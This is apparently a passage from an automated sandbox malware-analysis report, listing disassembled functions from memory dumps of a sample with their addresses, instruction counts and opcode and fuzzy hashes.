                                                            • Opcode Fuzzy Hash: c012b845b42070051a31875cf91c7959e81139f3254afcd90308c8744e28c7be
                                                            • Instruction Fuzzy Hash: 27F03021E1C81A9FFB84FB1888553B826D2FF58340F0444B5D40DD36C3CE28BC814B45
                                                            Function 00007FF848BF3BE0 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1ae7b4259b4d15800b6bab4334f4210cdfb9327f7ff5e6423093805f4ce8a65
                                                            • Instruction ID: 2ab14acb7ad0739c6c298612f23aed5bf2bf6a5cc2e12bbab99531e9d5d24c19
                                                            • Opcode Fuzzy Hash: e1ae7b4259b4d15800b6bab4334f4210cdfb9327f7ff5e6423093805f4ce8a65
                                                            • Instruction Fuzzy Hash: 4FF05E74A1951B8FEB18EF44C8608BE73A1FB44341F00063DC016D7785CFB469018B84
                                                            Function 00007FF848BE0B87 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 219628571ccd9c8580d774db79feb64ebbc2dc4ff318369a6b9ac2c7cab95818
                                                            • Instruction ID: 0d2c741ec7ef374ff08029d41daaeef2fe5b315b8e9c585dbba2a79126abfa1b
                                                            • Opcode Fuzzy Hash: 219628571ccd9c8580d774db79feb64ebbc2dc4ff318369a6b9ac2c7cab95818
                                                            • Instruction Fuzzy Hash: 96E086216598498FCB09BB3C9CA58E5FB60FB47254B8B00EAD04CC75A2E355585DC741
                                                            Function 00007FF848C17654 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d9e82237fd2795920a24e7a7c0e9969c6e6ace69a29f56f769796528bfcdafb6
                                                            • Instruction ID: 1bbb912cc5b691e17ca0d5dcb4d1079e831765b4280e8b77a080912d8b3dfd7e
                                                            • Opcode Fuzzy Hash: d9e82237fd2795920a24e7a7c0e9969c6e6ace69a29f56f769796528bfcdafb6
                                                            • Instruction Fuzzy Hash: EEE0ED3198E7C08FC74B973588688947F70EE1721074A80EFC0858B1A3D619884ACB12
                                                            Function 00007FF848BF42CA Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5b58fa8bf8a9147a97f1dff56b322efeef3a78b45d8e9ebf2eeed05957f1dfd
                                                            • Instruction ID: 1d425e2ce4516e8fc8818928f9932ce293ab34e645df4dffbbdc3c0f9539b686
                                                            • Opcode Fuzzy Hash: d5b58fa8bf8a9147a97f1dff56b322efeef3a78b45d8e9ebf2eeed05957f1dfd
                                                            • Instruction Fuzzy Hash: DBE04F32A1C4068FF751F60488806BE3343EBD43A0F104771C149C7585DF7C65469688
                                                            Function 00007FF848BF3790 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                            • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                            • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                            • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                            Function 00007FF848C1A1F0 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FF848C1A160 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FF848BF254C Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f8d376c7768ba4789b57a02dedae8dff34f1af5dc047dd7469a7b0861b53df7
                                                            • Instruction ID: f637cece23751414bc055f4154f2f6b90bb9c015dec64dc554fa5da256b45d32
                                                            • Opcode Fuzzy Hash: 1f8d376c7768ba4789b57a02dedae8dff34f1af5dc047dd7469a7b0861b53df7
                                                            • Instruction Fuzzy Hash: BEE0C23274C9074FFB42BA148C508BD3346EBE0390F250275C40DC36E1EF2CE5011248
                                                            Function 00007FF848C1D2A9 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f802853711f2b69c79d087a6a76ed6962c57ed86a9c43ceacd447d9972626def
                                                            • Instruction ID: 1b4ebd1919fc3ac625dd748e07aae0e8449bbdd6139a3f2e232d244f06830ccd
                                                            • Opcode Fuzzy Hash: f802853711f2b69c79d087a6a76ed6962c57ed86a9c43ceacd447d9972626def
                                                            • Instruction Fuzzy Hash: 5DE01A2684F7C04FC74B973488A99447FA09E2721174A40EAC145CF2A3DA5A8849C701
                                                            Function 00007FF848C11CA0 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                            Function 00007FF848C1D23B Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44e114ff336cac15f46b28eb821f8ea7386fa3409af26d0af1e33da2fd3ed72e
                                                            • Instruction ID: af936b01047502ff762c84a7b8624c0a3524c41f5d766980ec644eb72fa4762e
                                                            • Opcode Fuzzy Hash: 44e114ff336cac15f46b28eb821f8ea7386fa3409af26d0af1e33da2fd3ed72e
                                                            • Instruction Fuzzy Hash: EAD0A73284A9848FCB4EEB3584ACC507F50DF2A20174440ECC04A8F2B2D929CC49CB00
                                                            Function 00007FF848C16BC8 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f839b3ae477174b7bce6ff66d2579b7a4b3cb68b7f6585187bbca21e2eae6a60
                                                            • Instruction ID: 97643f02ee876db3b124fd2b8da69dbb6a03dde61c6017228a71a4ef3c226477
                                                            • Opcode Fuzzy Hash: f839b3ae477174b7bce6ff66d2579b7a4b3cb68b7f6585187bbca21e2eae6a60
                                                            • Instruction Fuzzy Hash: 52D01234B949044FC70CBB3C88998747391EB6A216B9540A9D00AC72B5DA6ADC89CB81
                                                            Function 00007FF848C1B410 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 215aea51de87740e82caf9e74f110273ead1664760b6212c673f21130469829c
                                                            • Instruction ID: 8300b5dce4e149d04ded2dcee315951cf1e7e0d0f0f4517eda88f08899b367f5
                                                            • Opcode Fuzzy Hash: 215aea51de87740e82caf9e74f110273ead1664760b6212c673f21130469829c
                                                            • Instruction Fuzzy Hash: 96D01234B549044FC74CB63888998747391EBAA217B9550A9D40ACB2B1DA6EDC89CB41
                                                            Function 00007FF848BE12E8 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction ID: abdc657e7a3a855c09846e10842c7eb281929dfd8c16e3f7d8ab439ebaa3eccf
                                                            • Opcode Fuzzy Hash: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction Fuzzy Hash: 64C012305548088FCA48FB28C884D2473A0FB2A304B961094E00DCB2A1D72AECC2CB40
                                                            Function 00007FF848C072C9 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C01000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c01000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 13df160224c2bcd2965fb05debf691487a7bbe4ee256023bcaab3fb6aecba31b
                                                            • Instruction ID: 47ac6bbe31d5946ac00ae0639f53e98a549a69c254f37dda7dfa6ed4be4a496a
                                                            • Opcode Fuzzy Hash: 13df160224c2bcd2965fb05debf691487a7bbe4ee256023bcaab3fb6aecba31b
                                                            • Instruction Fuzzy Hash: AAC0804355E6910DE30852D434520F4AB40EA021B1B1411B7D19506593E90F55D345D5
                                                            Function 00007FF848BE06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction ID: b9fe45570297cd260a1800fe7072eca5aba27ab0914f1057f530c47f1bf97404
                                                            • Opcode Fuzzy Hash: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction Fuzzy Hash: D7C08C04D1EC0B0FFA00B96E244A0BCA100BBD42A0FD00032C40C40CC1DE0D20D7015F
                                                            Function 00007FF848BE0708 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8330e0558b660b4b0056c2e9ffd26dfad95a3688740041a8927d16767c759552
                                                            • Instruction ID: 17368139f8a1dacb6f786869eb0f9cec53344e27d0d5e273b6cc840f5e988781
                                                            • Opcode Fuzzy Hash: 8330e0558b660b4b0056c2e9ffd26dfad95a3688740041a8927d16767c759552
                                                            • Instruction Fuzzy Hash: CBC04C3052580D9FCA54F729C98596476A0FB09205BD510D0E409C7561E65A98549745
                                                            Function 00007FF848BE4D37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d57ace5b0e99e9dbdb68c79cdc6f5d257e816d3feb6f68e72243ce7784e74202
                                                            • Instruction ID: ad0f1bc40a3ca5ffbf0cea74243d485cd0e9017763366086a389feb145be61ce
                                                            • Opcode Fuzzy Hash: d57ace5b0e99e9dbdb68c79cdc6f5d257e816d3feb6f68e72243ce7784e74202
                                                            • Instruction Fuzzy Hash: F3C08C00F198162AE36A321400002BE08428F80A45F500030E20EC23CBCF2C9A0302CE
                                                            Function 00007FF848BE06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction ID: 20779cffb7dda3c3fc45b299dea2dc3103412a7452f27568bcfa4a6707d3aa4b
                                                            • Opcode Fuzzy Hash: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction Fuzzy Hash: 4FB01204C6E80F0EE504317E194A07970406B44150FC00070D80C50881D94D10A6025B

                                                            Non-executed Functions

                                                            Function 00007FF848BE09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: db7db789215197556183f15bdf63783da6bcc1ca6bc41843d4fc2c55a3ec7cc9
                                                            • Instruction ID: 13beca0d0e7572deca652cc6abb1098c7cf1e02a46ace2305948fe54b0ded23b
                                                            • Opcode Fuzzy Hash: db7db789215197556183f15bdf63783da6bcc1ca6bc41843d4fc2c55a3ec7cc9
                                                            • Instruction Fuzzy Hash: A4418347A0FD666AEA113AFD74811FD5B64FF812F6F184677D24C894C38E28609282FD